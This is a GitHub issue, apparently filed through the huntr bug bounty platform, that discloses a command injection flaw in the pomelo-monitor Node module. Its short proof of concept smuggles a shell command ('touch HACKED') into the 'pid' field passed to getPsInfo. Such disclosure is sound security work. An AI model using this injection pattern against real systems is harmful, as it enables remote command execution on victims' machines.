huntr - RCE via insecure command formatting (Command Injection)

This issue has been generated on-behalf of Mik317 (https://app.huntr.dev/users/Mik317)

## Details
I would like to report a `RCE` issue in the `pomelo-monitor` module.
It allows to execute `arbitrary commands remotely inside the victim's PC`

## Vulnerability Description
The issue occurs because a `user input` is formatted inside a `command` that will be executed without any check. The issue arises here: https://github.com/halfblood369/monitor/blob/master/lib/processMonitor.js#L26

## Steps To Reproduce
```js
// poc.js
var monitor = require('pomelo-monitor');
var param = {pid: 'test; touch HACKED; #', serverId: 'node-1'};
monitor.psmonitor.getPsInfo(param, function(err, data) {});

```
1. Check there aren't files called `HACKED` 
2. Execute the following commands in another terminal:

```bash
npm i pomelo-monitor # Install affected module
node poc.js #  Run the PoC
```
3. Recheck the files: now `HACKED` has been created

## Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded :moneybag:? Go to https://huntr.dev/

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

huntr - RCE via insecure command formatting (Command Injection) #1

Details

Vulnerability Description

Steps To Reproduce

Bug Bounty

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

huntr - RCE via insecure command formatting (Command Injection) #1

Description

Details

Vulnerability Description

Steps To Reproduce

Bug Bounty

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions